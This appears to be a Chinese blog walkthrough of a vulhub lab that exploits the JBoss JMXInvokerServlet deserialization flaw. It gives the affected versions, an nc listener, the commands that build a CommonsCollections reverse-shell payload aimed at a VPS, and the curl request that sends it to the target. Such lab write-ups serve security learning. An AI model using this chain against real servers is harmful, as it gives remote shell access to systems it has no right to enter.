【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞

前言

影响版本
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

一、启动靶机

docker-compose build
docker-compose up -d

二、漏洞挖掘

访问如下URL时,出现下载文件

http://192.168.150.146:8080/invoker/JMXInvokerServlet

在这里插入图片描述

三、漏洞利用

1、下载利用工具:JavaDeserH2HC(http://scan.javasec.cn/java/JavaDeserH2HC.zip)
2、用VPS nc监听8888端口

nc -lvp 8888

3、把上面下载到的工具复制到 vps 里面,解压即可,进入解压目录,输入如下命令:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap VPS_IP:8888

(IP是VPS的ip,8888是下面要监听的端口,这里写哪个端口下面就要监听哪个端口)
在这里插入图片描述
4、因为我公网vps访问不到靶机,所以我把生成ReverseShellCommonsCollectionsHashMap.ser文件放到真实主机执行

curl http://192.168.150.146:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

上述命令的IP为靶机,即目标。
在这里插入图片描述

四、检验

在VPS上,nc收到反弹shell
在这里插入图片描述

参考:

https://blog.csdn.net/Aaron_Miller/article/details/106623088

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值